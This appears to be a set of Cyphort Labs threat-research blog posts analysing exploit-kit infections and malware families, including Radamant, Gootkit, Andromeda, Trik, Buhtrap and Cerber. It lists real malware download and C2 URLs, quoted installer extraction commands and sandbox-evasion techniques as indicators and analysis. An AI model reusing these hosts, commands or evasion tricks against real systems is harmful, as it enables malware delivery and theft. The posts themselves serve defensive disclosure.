• www.yatra.com
• www.herbeauty.co

Infection Chain on yatra.com

Infection Chain on herbeauty.co

On the affected page, a malicious html code was injected at the end of the page. The code displays a malicious flash file that redirects to Rig EK landing page.

Injected Code

As of this writing the said websites are now free from infection.

Flash Exploit

The Rig EK on both sites uses the same flash exploit and also delivers the same payload. The flash exploit targets the following vulnerability:

• CVE-2015-5560

This is an old exploit which affects versions 18.0.0.209 and below. The exploit was patched on August 15, 2015 via Adobe flash player update 18.0.0.232. After exploitation, it will download its payload.

Radamant Ransomware

This is a new breed of ransomware that encrypts files using AES-256 encryption. Bleepingcomputer.com provides an excellent coverage of this ransomware. This malware was also found to be leased as a kit on private  malicious sites. It costs $1,000 to rent it for one month or potential buyers can test it for 48 hours for $100 USD.

Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/

As early as December 14, people have been complaining  on bleepingcomputer forum that  their files encrypted and renamed with .RDM or .RRK extension. This malware scans all files that match certain extensions and encrypts them using a unique AES-256 key for each file. The  generated AES-256 key is then encrypted with a Master key which is then embedded into the target file.

Network Connections:

The malware will first issue a POST request to its CnC server http://cutenaskare.com/domains.php to get possible domain/s

             POST http://cutenaskare.com/domains.php

             Server Reply: [7:cutenaskare.com]

Then it will POST to http://cutenaskare.com/API.php together with its ID and IP address to check if it is already registered in the server

              POST http://cutenaskare.com/API.php  id={machine fingerprint}&ip={victims IP address}

               Server Reply: [0:unknownID][6:{IP region e.g., RU}]

If the victim is new it will reply with [0:unknownID] which instructs the bot to register and post additional system information.

               POST http://cutenaskare.com/API.php   id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}

               Server Reply:[r:good]

The server will send its public key and the malware will POST to:

              POST http://cutenaskare.com/mask.php

The server replies with a list of extensions to encrypt which also triggers the start of encryption. After the malware is finished encrypting files, it will show the following page informing the user that files have been encrypted and instructing the victim to pay .5 Bitcoin (approx 220 USD).

Luckily the malware’s encryption had some flaws which allows  Fabian Wosar to recover the encrypted files without paying the ransom. 

Fabian’s tool can be downloaded from the following link:

• emsi.at/DecryptRadamant

The tool has been updated to support the latest version known. It is also evident that the malware author/s aren’t pleased with Fabian as they placed some cursed strings on their code in the latest version.

The first version of radamant was first seen on virustotal.com on Dec 3, 2015 and we have identified 3 versions to date.

Indicators of Compromise

Mutex Names:

Radamant_v1_Klitschko_number_one

Radamant_v2_Klitschko_number_one

\Sessions\1radamantv2_emisoft_fucked

Install Path:

C:\Windows\DirectX.exe

Registry Keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

      Value:svchost or DirectX

      Data: C:\Windows\directx.exe

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

      Value: svchost or DirectX

      Data: C:\Windows\directx.exe

On January 27, 2016 Cyphort Labs discovered a site infected with Angler EK leading to a fileless Gootkit (a.k.a. XswKit) malware. The site was redirecting visitors to the malware through a compromised OpenX Ad server injecting a malicious iframe into the page. The iframe leads to Angler EK which downloads Bedep ad-fraud which then downloads a Gootkit loader. 

The loader injects a DLL component found in its body into explorer.exe. The injected DLL then downloads the fileless Gootkit and saves it in the registry as binary data,  then loading it in memory only.

Infection Chain

The compromised site is a Romanian broadcasting company, www.tvr.ro. The chain starts from bannere.tvr.ro making HTTP request to OpenX Ad server which will inject an iframe to the webpage. It appears that the OpenX Ad server was infected, specifically the file /openx/www/delivery/ajs.php. In previous years, there have been reports of a vulnerability in OpenX software which will allow the attacker remote code execution and code injection. We believe that this is likely the case here but we are not sure if this is a new vulnerability or an old one.

The iframe leads to  Angler EK which makes use of a flash exploit, CVE-2015-5560. The flash exploit downloads Bedep ad-fraud malware which will download the Gootkit loader. 

Gootkit Loader

This executable is saved in the %windir% folder with a random numbers as the filename e.g. 2144874235-50823412.exe. It is a packed executable where most of the packed data is in its .rsrc section.  After unpacking, it unwraps a DLL component found in its .data section and injects it into the explorer.exe process.

The unpacking of the DLL uses some custom decryption algorithm. After unpacking, it searches for explorer.exe process and inject the dll. There are two ways it can inject to explorer.exe: either using CreateRemoteThread or modifying the process’s main thread using ThreadContext APIs. Then it terminates itself.

Injected DLL

The injected dll is the main malware routine. Its main purpose is to download additional malware from a set of domains and save the downloaded malware as a binary data in the registry. It first checks for its execution environment which it also uses to initialize its variables. It also set an environment variable “vendor_id” with value  “unstable_2380”. The unstable value might mean this is an unstable version which could mean it is still under development. It then creates five threads, each with a different task.

The first 2 threads are responsible for downloading file-less malware while the third and fourth thread are responsible malware update. The fifth thread is a “kill-self” mechanism which is triggered by the presence of uqjckeguhl.tmp in the %TEMP% folder.

First & Second Threads

The first thread is responsible for injecting code into the current process. It starts by waiting for an event triggered by the second thread. Once that event is triggered, it will inject the code downloaded by the second thread to the current process, which in this case is explorer.exe.

The second thread connects to the following domains via SSL: 

• karlsadovnik75[dot]com
• karlsasyxushee75[dot]com
• karlsasyn725[dot]com
• karlsadroch27[dot]com
• karlsamochux2[dot]com
• karlsabrero22[dot]com
• karlsalomun9[dot]com
• karlsaranu82[dot]com
• karlsardabale9[dot]com

It uses HttpOpenRequest to make a request for SSL connections by setting the dWflag to 0x84800300, which sets the flag for INTERNET_FLAG_SECURE.

By using SSL, it is able to add a layer of protection for its network traffic. However, it appears that the certificates from these domains are not trusted. In order to bypass it,  it uses InternetQueryOption and InternetSetOption to set the INTERNET_OPTION_SECURITY_FLAGS to ignore invalid certificates.

The return of InternetQueryOptionA is ORed with 0x7380 which sets the following flags. In effect, it will ignore the untrusted certificates and ignore the redirect to https:

• SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS
• SECURITY_FLAG_IGNORE_CERT_CN_INVALID
• SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
• SECURITY_FLAG_IGNORE_WRONG_USAGE
• SECURITY_FLAG_IGNORE_UNKNOWN_CA
• SECURITY_FLAG_IGNORE_REVOCATION

The downloaded data is saved into the registry as follows:

• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_0
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_1
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_2
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_3
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_4
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_5
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_6

As shown, the saved data is encrypted and does not result into an executable file.

The second thread is also responsible for querying the data in the registry. It decrypts the data using a custom XOR decryption and decompresses it using RtlDecompressBuffer.

After which, it sets an event which triggers the first thread to proceed with process injection. 

Third and Fourth Thread

The fourth thread is responsible for downloading a file from the same domains above. The exact url path is {Domain}/rpersists2/%d where %d is some random number. It also expects the downloaded file to be having “MZ” header.

The third thread saves the downloaded file in the %Windir% folder using random number filename such as 2144874235-50823412.exe. It will also create a registry entry to ensure its execution every after reboot such as:

• HKCU\Software\Microsoft\Windows NT\CurrenVersion\Winlogon\Shell            
  • Data: C:\Windows\2144874235-50823412.exe

File-less Gootkit

Gootkit malware was first discovered in 2014. It is a banking trojan which initially focused on French banks and later on expanded to European banks as reported last December by Proofpoint.

The version we were able to capture appears to be version 4 as seen in its code:

The file size is pretty large at 4.86MB. References to source code can also be seen in the sample such as:

• src_iedriver\CabFile.cc
• src_iedriver\CertGen.cc
• src_iedriver\node_xz.cpp
• src_iedriver\socket_watcher.cpp
• src_iedriver\SpywareJSWrappers.cc
• src_iedriver\sqlite\node_sqlite3.cc
• src_iedriver\Threading.cc
• src_iedriver\VideoRecorder.cc
• src_iedriver\VmDetection.cc
• src_iedriver\wincrypt.cc
• src_iedriver\WindowsRegistry.cc
• src_iedriver\ProtectedStorage.cc

This gives us an idea of the capabilities of this malware. For instance, SpywareJSWrappers is likely the spyware module. This module has some APIs used for stealing information such as SpAddPortRedirection, DownloadFileRight, SpHookHttp, SpTakeScreenshot, SpHookRecv, SpHookSend, SpInsertInjection, SpHookKeyboard , etc.  

Summary

We have seen in this infection how attackers try to hide their infection through fileless malware and SSL traffic. They also utilized Angler EK as means to deliver their payload with its ability to detect AV engines and encrypted binary download. In our recent blogs, we have shown how Angler uses Bedep to download additional malware such as POS malware. Bedep is known to be an ad-fraud malware with download capabilities. We have not seen Bedep to be installed in the file system as the usual case so in this case, it acted only as a downloader. In this infection, the goal is to install Gootkit, a very dangerous malware with Backdoor and Spyware capabilities while achieving stealth through fileless infection and encrypted network traffic. The Gootkit loader is detected by Cyphort as TROJAN_WALDEC.DC.

Cyphort Labs will continue to monitor this threat and will provide additional details as needed.

As of this writing, the site is now clean from infection. 

Hashes

136fe64689f3919e1ba46e384ca8bef7 – Gootkit Loader

Special thanks to Alex Burt, Abhijit Mohanta, Sandeep Mandhotra and rest of Cyphort Labs for the discovery and analysis of this infection.

On March 9 2016, Cyphort Labs discovered an infection on a porn site keng94(dot)com redirecting visitors to an exploit kit and installing a Ransom Locker. The site is redirecting users to rg(dot)foldersasap(dot)com which is a RIG EK landing page that serves a malicious flash file and a malicious binary.

Chain and RIG EK landing

The binary arrives encrypted over the network and after decryption, it is saved in the %temp% folder. The binary is  a new trojan-downloader type of malware but we found multiple references of the string “FA” in its code which gives us an idea on the specific name/family of the malware.

•  ItsMeFA
• “version_fa”
• fa 155 

It adds an autostart key in the registry and copies itself in the StartMenu folder to execute itself at every start-up. It creates the file “C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc“. This a tor configuration file which indicates how tor is being used.  The config file is set to start a “Tor Hidden Service” which can be accessed using port 1060. Tor is a free tool that is used for network anonymity.

torrc file contents

After creating the torrc file, it downloads a file from “http://myfiles(dot)pro/uploads/1275859359.Gaga.mp3” and saves it as C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe

This file is actually an executable file masquerading as an mp3. When started, it spawns the following process:

• C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe -f torrc

And as the usual tor execution process, the following files are created.

As a hidden service, tor automatically generates an onion address (e.g., 43zri2d6x2rruezl.onion) for your machine and it is written to a file named ‘hostname’. It uses this tor hidden service to download its final payload. The use of the tor hidden service allows the attacker to hide its malicious network activity in the tor network. A few moments later, the following window covers the entire screen making it unusable.

Since it locked our system, we thought of booting it in safe mode for further investigation but we were not able to do so. We decided to analyze it offline and we used volatility  to analyze the memory image.

Using Volatility to Find the Malware

We obtained the memory dump and process tree list using volatility command “pstree” and found the sd_app.exe to be the last process spawned which is also spawning another instance of tor.exe. This is likely the downloaded app and responsible for locking our screen.

To confirm this, we list visible windows using the “wintree” command  to identify which process is responsible for the lock screen and we identified the same sd_app.exe. 

Next, we identified the full path of the file using the process id and ‘cmdline‘ command

We dumped the disk and found the following list of files added.

The .bat  disables advanced boot options using bcedit which explains why we are not able to boot in safe mode.

contents of 1.bat

In-the-Wild Samples

Using VirusTotal service, we searched for similar samples and found 4 related samples. The first appearance of the sample is last February 01, 2016 with very low detection when first submitted. The files are also signed but the certificates are invalid. The resources section of the binary points to Russia or Ukraine. 

The variants of sd_app are also signed but 2 of the files still have no detection. 

We also found the files uploaded have debug prints in the code and files are uploaded from Ukraine which indicates that the actors are using VirusTotal to test if their malware is detected by heuristics. The first variant uploaded in VT has version 0.01a-154d as indicated by the ff string:

• WIN32-VS-x32-RELEASE-Feb  1 2016-15:33:48 v.0.01a-154d

The sample we got is version 0.02a-155. This clearly means it is in the early stage of development.

Conclusion

It’s been a while since we have seen a new family of Ransom Locker in-the-wild, probably due to the success of file-encrypting ransomware such as Cryptolocker, Cryptowall, Locky, etc. Also, Ransom Lockers can be easily cleaned by using “rescue discs”  so it was not effective for monetization. However, this new discovery is an advancement of ransom locker malware as it is using Tor to communicate to its CnC servers. By using tor, the attacker adds a layer of anonymity while doing its malicious activity. Also, while the attacker got your machine kidnapped, they created a Tor hidden service that allows the attacker to utilize your system for bitcoin payments or other malicious activity. As discovered by a researcher, there has been an spike of tor hidden services due to the ongoing spam campaign of Ransomware Locky. We also believe that the malware is in its early stages of development and the actors are testing the waters. 

Cyphort’s Advanced Threat Detection is able to detect the exploit infection and also detects all the payload files through behavioral detection.

Special thanks to Alex Burt and Cyphort Labs for their help in analysis and discovery of this malware.

IOCs

 Trojan Downloader hashes (FA)

5ed449fc2385896f8616e5cd7bee3f31

3a00058ccaee78805f539f2f6a259e92

d183ed4609e6ad7b00250c50a963db5d

6af38533fc8621128e943488a6f189ed

fb016a14ef1384ec78a284636631ab17

Screen Locker (SD)

29e71b864ac46bd3e2c216cce0403114

 639c62bcae61054a229ed3c79a109cc4

092b9e87bd75384df188feb2c4e402a2

e8231d2b7a04a5826a78b2908a1dd393

Mutex Names

ItsMeFA

ItsMeSD

On June 30, 2016, Cyphort Labs discovered an infection via malvertising on the website trendystyleshop.com. According to Domain Tools, the site was registered in February 2016 under namecheap.com. What draw our interest to this infection is that it installs TeamViewer, a popular remote application tool which is widely used in enterprises. It makes sense for cyber criminals to use it because it is a good way to masquerade backdoor access as it blends with other users using the same app. You probably recall that a month ago a major hack of TeamViewer accounts was reported on various news outlets.

Infection Chain

The affected ad network is “nanoadexchange.com”. It advertises a game from “uphillrush.pro” but the ad is injected with an iframe that redirects to “aga111.pro” then redirects to “jnqedq.lswswc.xyz” which is hosting a Flash exploit kit.

After successful exploitation, it downloads an Andromeda bot from the same domain. The binary arrives encrypted over the network. 

The bot is installed in the %APPDATA% folder and filename starting with ms*.exe. Example:

• %APPDATA%\msqgoj.exe

As a persistence method, it will spawn a new process of “msiexec.exe” and inject its code. However, it will not install itself if the following processes are found as part of its Anti-Sandbox and Anti-Analysis trick:

• avpui.exe
• filemon.exe
• netmon.exe  
• perl.exe
• prl_cc.exe
• prl_tools.exe
• prl_tools_service.exe
• procmon.exe
• python.exe
• regmon.exe  
• sandboxiedcomlaunch.exe
• sandboxierpcss.exe  
• sharedintapp.exe
• vboxservice.exe  
• vboxtray.exe  
• vmsrvc.exe  
• vmtoolsd.exe  
• vmusrvc.exe  
• vmwareservice.exe
• vmwareuser.exe  
• wireshark.exe

However, it ignores the process blacklisting check when the following registry key is present:

• HKLM \ SOFTWARE\Policies\is_not_vm

Andromeda has been around since 2011. It is a modular type of malware with the following known types:

• Keylogger
• Browser Form Grabber
• Hidden TeamViewer
• Rootkit

For this infection, we have seen it installing additional modules from vbbb.ru including Browser Form Grabber and Hidden TeamViewer. 

The above image shows the communication to the CnC server. Bmla.ru is encrypted via RC4 where the key is hardcoded in the malware body. Download domain is at vbbb.ru but both are with the same IP address, 93.170.187.47.

As part of its routine, Andromeda gets the current time via NTP (Network Time Protocol) domains. It connects to the following NTP domains:

• pool.ntp.org
• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Is Andromeda On the Rise Again?

Using the IP of the CnC 93.170.187.47, we gathered some domains resolved from it. We found that it is actively using the .ru TLD with 4 random letters as domain and usually having the last 3 letters the same. It also shows that this pattern has been active since April 10, 2016.

^{Source: virustotal.com}

We also discovered that one of the IPs used by Andromeda is actively used by Cerber ransomware, a ransomware infection used to encrypt  that . For instance, znnn.ru was registered with the following IP addresses sometime in May 2016.

It is unclear to us how the installation of TeamViewer is being exploited at this time by the actors behind this campaign, but it clearly is a major compromise that opens the door to a lot of possibilities. Cyphort Labs will continue to monitor and report any new developments.

IOCs

Over the past couple of months, Cyphort Labs identified a new version of Trik bot. Our in-the-wild Top Threats identification shows this bot to be one of the top in June and July. Trik is a worm which propagates through removable and network drives. It can also propagate by copying itself in web root folders, ftp folders or other folders that are accessible online. It is also a backdoor that communicates via IRC. Other names of this bot are Backdoor:Win32/Kirts or Worm:Porphiex. Cyphort Labs did a deep dive analysis of this malware.

Discovery

Trik is an old bot which was first seen in 2011. Its modus operandi is to use instant messaging systems to propagate. Over the past years, this bot appears to go quiet. From January to May 2016, we have only identified 84 variants of Trik. However starting from June to July 25, we identified 1,447 variants of the sample.

We discovered an early version of this bot on Virustotal which was seen on February 15, 2016. The sample with sha256 cdb6f46a56d97a962278960f4a58bbcd2270f27635f7c638884968ae44205931 timestamp is February 11, 2016. The sample is also packed with the compressed data in its resource section.

We unpacked this file and identified the name and version of this bot based on the reference of its .pdb file.

• C:\Users\x\Desktop\Home\Code\Trik v1.8\Release\Trik.pdb

Fast forward to July 2016, Trik uses a .NET packer/protector. Also the pdb file shows it is now in version 2.6. This  means that from 2011 until May 2016, we are only seeing version 1 updates of Trik but starting June, the actors are actively involved in the operations of Trik.

Aside from .NET protector, samples are now signed but from untrusted root CA.

The following analysis will now focus on the recent sample with sha256, 0b6258dc856fb84d11d368d3c8a4d6b3a379297ab08efa89b3f1a6ea5f556558

Packer

Similar to the first version, this .NET packer’s compressed data is in its resource section. It also has a loader which first checks for some sandbox and virtualization software before loading the payload.

The loader will first decrypt its configuration file in its resource section. The configuration is an array that defines the execution flow of the malware including mutex names. Based on the configuration, it can also delete the property of the file being downloaded from the internet by deleting this the alternate data stream “{filename}:Zone.Identifier”. This will bypass dialog window from browsers implying the file was downloaded from the internet. This is an indication that the attackers using drive-by-download as a means to install this bot.

Armoring

This variant also detects the following softwares which are popular sandbox, and network analysis tools:

• SandBoxie
• Fiddler
• Wireshark
• WPE

The configuration also identifies the process where it will inject its code. It may choose from either the following processes:

• vbc.exe
• RegAsm.exe
• AppLaunch.exee
• svchost.exe
• notepad.exe
• self

In our sample, it injects on itself by launching a suspended process and writes into it.

The code injected is located in the resource section and encrypted. The decryption is a combination of rolling XOR with the keys also defined in the configuration.

Main Payload

The unpacked code is not in .NET assembly format but in C++. The version of this bot is identfied on its pdb reference which is v2.6.

• C:\Users\s\Desktop\Home\Code\Trik v2.6\Release\Trik.pdb

Similar to earlier version, the unpacked code is straight-forward.

It will first employ its Anti analysis, Anti Sandbox and Anti Virtualization checks. If found, it will uninstall itself.

AntiVirtual

Blacklisted Processes

Blacklisted DLL

Blacklisted Window Names

Blacklisted File Name

Blacklisted File Path

Blacklisted User Names

“Tequilaboomboom” might be the preferred user name of the author used during development of the malware.

To check if it has already infected the system it looks for the mutex name  “t71. It also checks if it is running as:

• %windir%\M-50504502689047502405034500693020490\winmgr.exe

If not, it will create a copy of itself in the same path above. It also adds itself in the Authorized Application list in the Firewall Policy settings. Creates Autostarts and disables the Windefender service.

It will create four threads which is the main payload routine.

Worm Routine on Removable and Network Drives

This is not a typical worming routine where it will drop a copy of itself into target folders or drives. Instead, it will drop a script that will download a copy or most likely an updated version of “Trik”. This method is another evasion technique employed by the malware. Even if the version of the malware is already detected, those infected drives with the components of the worm will have a chance to evade the detection.

Trik will first check if the download urls are accessible by iterating a list of urls and trying to download the “.exe” in the temp folder.. For the sample we checked, the following are the download URL.

• http://124[.]158[.]10[.]82/t.exe
• http://125[.]212[.]217[.]30/t.exe
• http://220[.]181[.]87[.]80/t.exe
• http://125[.]212[.]217[.]33/t.exe
• http://210[.]211[.]116[.]246/t.exe
• http://host5050[.]ru/t.exe
• http://host5051[.]ru/t.exe
• http://ouefuguefhuwuhs[.]ru/t.exe
• http://uwgfusubwbusswf[.]ru/t.exe           

After successful verification, it proceeds on finding specific drives. It targets removable and remote drives except drive “a” or “b”.

Depending on the type of drive, it will drop the following files:

• Autorun.inf
• DeviceManager.bat
• Manager.bat (if target drive is network drive)
• Manager.js (if target drive is removable)
• .lnk (shortcut file to Manager.js or Manager.bat)

Autorun.inf will function as an autostart and simply opening the drive will execute the malware. It executes Manager.bat or Manajer.js which will then execute DeviceManager.bat. DeviceManager.bat will contain a powershell script that will download and execute a copy or an update of Trik as %temp%\winupd.exe. As an additional evasion technique, it adds random strings in between lines of the scripts. For example, contents of autorun.inf are as follows:

Without the randomizer, the script will only contain the following:

DeviceManager.bat executes a powershell script or launches bitsadmin.exe to download Trik. It contains the following: (We removed the random strings to show clearly how the script works)

Worm Routine on Fixed Drives

Aside from worming on removable or network drives, it will also propagates a copy of itself into specific folders in fixed drives. It targets folders related to web root folders, ftp folders, or other sharing folders. It specifically looks for the following sub strings in the folder:

If found, for every “.exe” file in that folder, it will replace it with a copy of itself. Likewise, for every “.zip” or “.rar” in that folder it will add a copy of itself as “README.txt.scr”.

Backdoor Routine

Trik is an IRC backdoor. The sample we analyzed connects to any of the following IRC servers all on port 5050:

• 125.212.217.30
• 220.181.87.80
• 124.158.10.82
• 125.212.217.33
• 210.211.116.246
• host5050.ru
• host5051.ru
• ouefuguefhuwuhs.ru
• uwgfusubwbusswf.ru
• oeuuguhwugfuuws.ru
• efugusgdugugg.ru
• wdoaefaeodegfe.ru
• foeaufguehuaee.ru
• efuegdugugg.ru
• wdoargsiheffea.ru
• fofhihihienfospf.ru
• fgazeeufueea.ru
• wgwuwgruwddhuw.ru

If one of the IRC servers is online, it will issue a NICK containing system info and USER command. The USER command contained fixed parameters which is always ‘x “” “x” :x’

The NICK message contains system information including windows version, keyboard layout info, and whether the user is admin or not.

If successful, it will now wait for specific commands. It specifically looks for strings “001”, “433”, and “332” in the message as a signal for command. Command 001 means it will ask the bot to join to a specific channel. Command 433 instructs the bot to send system information. Command 332 contains additional sub command. It can instruct the bot to:

• Remove itself from the system
• Send more system information
• Download and execute files

It also seeks specific countries by getting the geolocation of the infected user through http://api.wipmania.com/. It will only download from specific list of countries hardcoded in its body. The list contains only countries from Americas and European countries.

Cyphort detects Trik as TROJAN.KIRTS.CY

In our recent blog, we talked about the delivery of Buhtrap by using compromised website and a recent web exploit. On this blog, we will focus on the second stage payload and the state of Buhtrap operation.

The Buhtrap downloader employs checks before it will infect a system. First, the system must have banking processes or banking software running, mostly Russian. Or the system must have an indication that it is visiting any Russian banks defined on its list.

If the system meets any of the 2 requirements above, it will download and execute the next stage malicious payload, otherwise, it will download a benign sample.

Technical Analysis of Second Stage Payload

The 2nd stage payload is an NSIS compiled sample as seen on previous Buhtrap samples. This is one way Buhtrap is trying to evade AV detection by disguising as an installer. NSIS is an open source software widely used in installers. Recently, we are seeing a trend where ransomware are adapting this method as the case with Locky and Cerber.

The sample is also digitally signed with a valid digital certificate and also contains file properties and versions.

Installation

Inside the NSIS package is a 7zip password protected archive. This is where all its components are stored. With this, a command line 7zip tool is also included in the package to unzip the component files. The password is hardcoded on the NSIS script and the password is different from other Buhtrap samples we have seen. For this sample, the password is “p2DP9ENv5bK”. It also modifies the timestamp of the file using a custom file utility FileTouch.exe which is basically similar to the touch utility in Linux

Below are snippets of the NSIS script that we extracted:

We executed the file on our box but we found that it did not do anything. Inspecting the NSIS script reveals that it is checking if the system language is Russian via GetSystemDefaultLangID.

We hooked this API and forced the malware to think we are in a Russian system.

After-which, the following commands and processes were monitored:

^{attrib  -h -s -r “C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno”}

^{7za.exe  x -p2DP9ENv5bK install.dat dev2055.tmp -aoa}

^{7za.exe  x -p2DP9ENv5bK dev2055.tmp -aoa -o8992023.tmp}

^{7za.exe  x -p2DP9ENv5bK install.dat FileTouch.exe -aoa}

^{C:\Users\Administrator\AppData\Roaming\Microsoft\Zerno\zerno.exe}

As shown above, the malware components are extracted into  “%AppData%\Microsoft\Zerno”. Then zerno.exe was executed. The Zerno folder has the following files:

From these files, only the files zerno.exe and msvcr71.dll are malicious. The other files are benign files which are part of Notepad++ software. This is an attempt to obscure its malicious behavior as it tries to pretend to be a legitimate Notepad++ installer. 

For persistence, it creates a shortcut link in the start-up folder that will launch zerno.exe at every startup.

What Does this Malware Do?

The main executable is zerno.exe and interestingly its only job is to launch the msvcr71.dll library which performs all the malicious behavior.

Msvcr71.dll

This is where all the malicious routines are compiled. This is a trojan-spyware which has the following functions:

• Keylogger
• Get System Info
• Read Smart Card Info
• Downloader

Keylogger

The keylogger thread creates an invisible window procedure and retrieves and handles the messages. It logs this information into “uninstall.log” located in %temp% folder. 

The following snapshot illustrates how it implemented the keylogger routine.

Smart Card Reader

One of its interesting payloads is to read smart card information. It lists available smart card readers and their status by using “WinSCard.dll” APIs:

It does not actually read what is in the smart card only determine their status. It logs all these information in “uninstall.log”

Downloader

It is also capable of downloading additional malware from its CnC server. Another interesting feature of this malware is that it is capable of diskless loading by checking on the response from the server. The first 2 bytes are checked, If the downloaded file starts with ‘MZ’ (0x5A4D), it writes the file into %temp% folder and executes it. If the response starts with “LD” (0x444c), it will only load the malware into the memory.

Diskless Loading

CnC server

It communicates with its CnC server “quotedb.info” via HTTP Post. All communication we observed is encrypted.

State of Buhtrap Operation

As stated in our previous blog, the IP of rozhlas.site is 50.7.86.243. We looked into the domain history of this IP and found some interesting information about the current state of Buhtrap.

From the history of the domains, it appears they have used this IP from May to September, 2016. But it’s very possible that they are still using the same IP for their operation. If we look into the details of each domain, we can find presence of multiple samples, although with different behavior, but appears related to Buhtrap operation. For instance, 5 samples that were downloaded from getadobe.org differ in behavior from the sample we described in this blog. Those samples are detected by Kaspersky as “Trojan.Win32.Karamanak”, which is also their detection for the sample in this blog.

As seen on the domains, they are also using domain names related to Chrome, Adobe or popular graphics software as a way to stay low.

Chromelabs.org

Using this domain the actors started using CVE-2016-0189 as their method of infection. In fact, they used the same binary exploits found in the github repository of offensive security. The following are the files downloaded in this domain:

• http://chromelabs.org/data/shell32/51d2a95ddc.dll
• http://chromelabs.org/a3b4x62.exe
• http://chromelabs.org/blog/dsfsdhdh.vbs
• http://chromelabs.org/news/dsfsdhdh.exe
• http://chromelabs.org/track/automate.js

Adobelabs.org

A similar NSIS compiled payload was downloaded on this domain.

• http://get.adobelabs.org/zx/winax/fp_setup.exe

Also, the following files appearing as installers connects to this domain

Getcanvas.org

The samples we have seen from getcanvas.org are the same samples we found on rozhlas.site

Conclusion

It appears based on this research that the actors are using patterns in their attack and they are as follows:

• Using digitally signed malware
• Using NSIS and hiding their components in a password protected archive
• Using domains that are similar to popular softwares, eg. adobe, chrome
• Constantly changing their CnC domain but using the same IP

It is also evident that the actors are still very active. They are clever enough not to infect systems that are not their target which allows them to stay under the radar for as long as possible. These Tactics Techniques and Procedures are the hallmark of Advanced Persistent Threats groups.

Analysis by Dhruval Gandhi & Paul Kimayong.

Most sandboxes typically have some API monitoring module to be able to identify and describe what the program is trying to do. In order to do this, they hook APIs that they want to monitor using various techniques. Typically, a hook works by modifying the first address of the API call instructions to insert a jump to a specific address of the hooking module. The hooking module then proceeds to do whatever it wants to do with that code and then will jump back to the original API address. The following diagram depicts the typical flow of execution.

Just recently, we found Cerber samples that behave differently when hooked. When it is not hooked, the sample will just proceed with its normal malware routine. The sample is a NSIS compiled malware and it has the following files:

Initially, it will create another process of itself in SUSPENDED state. The idea is to unpack itself in the memory and inject this unpacked code into the next process. This technique is sometimes called “process hollowing”.

After creating a suspended process, it loads fosullas.dll. This dll is responsible for decrypting/unpacking the second stage of malware by reading the  file “Blackbuck”, decrypting it and injecting it into the suspended process.

When the second stage is loaded, it starts the typical cerber ransomware routine. The next thing you know, you are looking at the following message on your desktop which says all your files are encrypted.

You can also see the following files in folders with encrypted files.

Network Communication

The malware connects to specific IP ranges and port 6892 via UDP for its Command and Control.

What happens when there is hooking?

Based on this research, we have identified the following techniques used by Cerber as Anti-Sandbox tricks:

1. Crash the hooking module
2. Call useless window APIs in a long loop
3. Steal API addresses from the main executable’s IAT

When we try to hook APIs to monitor its behavior, the following window appears, and no Cerber Ransomware routine is observed.

Clicking on the “Next” to see if it does something but no malicious routine was observed.

We have tried a few sandboxes and different API monitors and observed the same behavior, which leads us to think that this malware detects for any active hooking. But how?

Intention to Crash the Hooking Module

To find this out how does it detect the hook, we attached a debugger to the API Hooking module and see its behavior.

This is where we observed some exceptions. The exception was an access violation in address 0x0000001C.

We looked at the stack to see where is this exception originating from. It originates from an API call in fossulas.dll. It is a call to recvfrom and it has the following interesting parameters.

Notice the parameters, socket, bufsize, flags, and pfromlen all have the same value (28 or 0x1C). Looks familiar? Isn’t it the same address causing an exception?

So we fired up IDA pro to see what is inside fossulas.dll.

The mentioned parameters above are referenced to a value in address 0x1001014C with hardcoded value of 0x1C.
We tried to bypass the exception above and executed the program. Then, we found another exception, this time on a call to CryptCreateHash.

The call to CryptCreateHash would again contain hardcoded values.

We looked at the other routines of fossulas.dll and it seems to be calling APIs with hardcoded values. For instance, the hKey in the call to RegQueryValueW is the same value in address 0x1001014C.

Based on the observation above, fossulas.dll appears to try to create an exception by arbitrarily calling APIs with invalid arguments. So what does this mean to the sandbox?

Normally, when there is no hooking involved, it will not be a problem. Most of the time, windows libraries have some exception handling in place.

However, when a hooking module is involved, it will possibly pose a problem because it would cause an exception to the hooking module when those APIs are hooked. Thus it would crash the program when there is no exception handling in place.

In summary, it does not try to detect the hook, instead it tries to crash the hooking module.

Call Useless window APIs in a long loop

We have also observed the samples we checked try to delay and call useless APIs in a long loop. Normally, in a sandbox, the execution period is cut into short time. When a delay is introduced,  the full behavior of the malware will not be monitored. We observed that in a sandbox where these APIs are hooked, these calls did really take a long time to finish.

GetClientRect inside a long double loop on sample 260c4918a8655949d58b2e8d11d1562a

FindWindowExA and GetCurrentProcesId inside a long double loop on sample 037a8be0c33ab5f34c150de153402048

Steal API addresses from the main executable’s IAT

Before unpacking the second stage, Cerber needs some APIs for reading and decrypting the second tage. However, the way it retrieves those APIs is interesting. It traverses through the main executable’s (in this case the NSIS compiled file) Import Directory Virtual Address and retrieve the APIs that it need by enumerating all the import APIs and do some partial string matching.
Our friends at McAfee have a detailed explanation of how this work. https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-families-use-nsis-installers-to-avoid-detection-analysis/

What happens in a sandbox?

In some of the Sandbox we tested where they employ IAT Hooking method, the above routine will fail as in an IAT Hook, the Import Address table after hook points first to the hooking module.
